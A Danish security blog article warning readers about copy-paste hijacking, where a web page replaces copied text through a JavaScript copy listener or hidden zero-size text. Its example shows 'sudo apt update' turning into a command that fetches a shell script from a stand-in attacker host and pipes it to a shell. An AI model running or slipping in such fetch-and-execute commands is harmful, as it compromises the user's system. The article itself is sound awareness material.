Copy og Paste hacking erstatter det du tror du har kopieret

By Michael RasmussenCopy Paste, Cybersecurity, Hacking

Brug ikke Copy Paste fra websider. Det er ret enkelt, mange bruger teknikkerne til at beskytte indhold på websider f.eks. tekster og billeder, men nu er det blevet en favorit at man kan installere scripts på denne måde.

De fleste anvender Control tasten sammen med COPY og PASTE, altså at markere et område og trykke Control C for dernæst at indsætte i andre programmer f.eks. Office, Webeditorer, Excel m.v.

Værre er det hvis man kopiere til en terminal server, shell eller konsol for der kan. være tale om du f.eks. indsætter skadelige scripts der ændrer dns, sletter en fil, ændrer er lokal netværk og der kan indsættes filer. Return er også en kode der indsættes, så linien udføres med det samme.

Teknikkerne er kendt fra falske likes, afstemninger, tvungne linkbesøg og tvungne dialogbokse

En sikkerhedsforkser demonstrerer et simpelt trick, der får dig til at tænke dig om en ekstra gang, før du kopierer og indsætter tekst fra websider.

Gabriel Friedlander, der er grundlægger af Wizer der laver sikkerhedsundervisning har demonstreret et overraskende hack, der vil gøre dig forsigtig med at kopi-indsæt kommandoer generelt.

Det er nemlig ikke usædvanligt, at både nybegyndere og dygtige udviklere kopierer almindeligt anvendte kommandoer fra en webside såsom ahem og StackOverflow og dernæst CTRL V indsætter dem i deres applikationer såsom Office, en Windows-kommandoprompt eller en Linux-terminal.

Men Friedlander advarer fordi enhver webside kan erstatte indholdet med noget andet så du modtager andet end det du klipper for at paste et eller flere steder. For selv serveradministratorer er det ikke usædvanligt at man indsætter for at installere med en eneste kommando. De fleste kopiere lange strenge, og der kan være scripts med hvid skrift der dermed IKKE kan ses og f.eks. lille fontstørrelse nul m.v. så du ikke kan se et script eller en kommando. Det kræver naturligvis at det website du er på er blevet hacket.

Udvikleren og systemadministratorer kan kun indse deres fejl EFTER at have indsat teksten, hvorefter det kan være for sent. Især hvis det er kommandoer.

I et simpelt proof of concept (PoC) offentliggjort på sin blog, beder han læserne om at kopiere en simpel kommando,  som de fleste sysadmins og udviklere ville være bekendt med nemlig: Sudo apt update

Men når du indsætter bliver dette til: Curl http://attacker-domain:8000/shell.sh | Sh

Prøv det på siden herover, som vi kan stå inde for… Medmindre en hacker har hacket hans artikel om COPY PASTE hacking.

Ikke alene får du en helt anden kommando til stede på din udklipsholder, men for at gøre tingene værre, er der indsat en ny linie eller RETUR karakter i slutningen af det du paster. Det betyder at kommandoer rent faktisk udføres uden at du selv trykker på returtasten.

Det betyder, at ovenstående eksempel ville udføres, så snart det er indsat direkte i en f.eks. terminal, ftp server, shell, prompt m.v. Men det har gennem tiderne også været anvendt ved sikkerhedshuller i f.eks. regneark og tekstebehandling.

Man indsætter teksten under indtryk af, at man kopierede den velkendte, uskadelige kommando sudo apt update,  der bruges til at hente opdaterede oplysninger om software installeret på dit system. Og dernæst har man kompromitteret sin server eller PC.

Hvordan kan det ske?

Magien er i JavaScript-koden skjult bag PoC HTML siden der er sat op af Friedlander.

Jf. W3 linket herunder er det JavaScript HTML DOM EventListener

Så snart du kopierer teksten“sudo apt update”,  der er indeholdt i et HTML-element, køres kodestykket, der vises nedenfor. Javascriptet der anvendes har sin egen REPLACE kommando, der kan erstattes til skadelige kommandoer uanset hvad og hvorfra det kopieres.

Hvad der sker bagefter er en JavaScript lyttefunktionen til at indfange kopi begivenhed ogerstatte udklipsholderen data med Friedlander’s ondsindede test kode:

“Det er derfor, du bør ALDRIG kopiere paste kommandoer direkte ind i din terminal,” “Du tror, du kopierer én ting, men det er erstattet med noget andet, som skadelig kode. Det kræver kun en enkelt kodelinje, der sprøjtes ind i den kode, du kopierede for at oprette en bagdør til din app.” “Dette angreb er meget simpelt, men også meget skadeligt.”

sigerGabriel Friedlander

Her er en lille video på Youtube der viser hvor nemt det er:

https://youtu.be/LFXZqQL4vTY

Copy Paste kan også laves uden Javascript

En Reddit-bruger præsenterede også et alternativt eksempel på dette trick, der ikke kræver JavaScript: usynlig tekst lavet med HTML- og CSS-styling, der bliver kopieret til udklipsholderen, når du kopierer de synlige dele af teksten: Se mere på: https://jsfiddle.net/rkqg9bf6/

Her anvendes altså hvis skrift i fontstørrelse 0 og du kan ikke se dette på hvis skærm.

“Problemet er ikke kun, at hjemmesiden kan ændre din udklipsholder indhold ved hjælp af JavaScript,” “Det kunne også bare skjule kommandoer i HTML, der er usynlige for det menneskelige øje, men vil blive kopieret af computeren.”

forklarer brugeren på det nævnte link, som ikke har et normalt navn

Altså en anden grund til aldrig blindt at stole på, hvad du kopierer fra en webside, man kan løse det ved at indsætte det i en teksteditor først.

En enkel, men ikke desto mindre, en vigtig lektion i den daglige sikkerhed.

Ovenstående teknikker bruges in the vild til at få likes, hjemmesidebesøg = trafik, at installere installere med kendte navne f.eks. WindowsDefenderUpdate.exe m.v.

Kilde: ICARE.DK og ovenstående 2 forfattere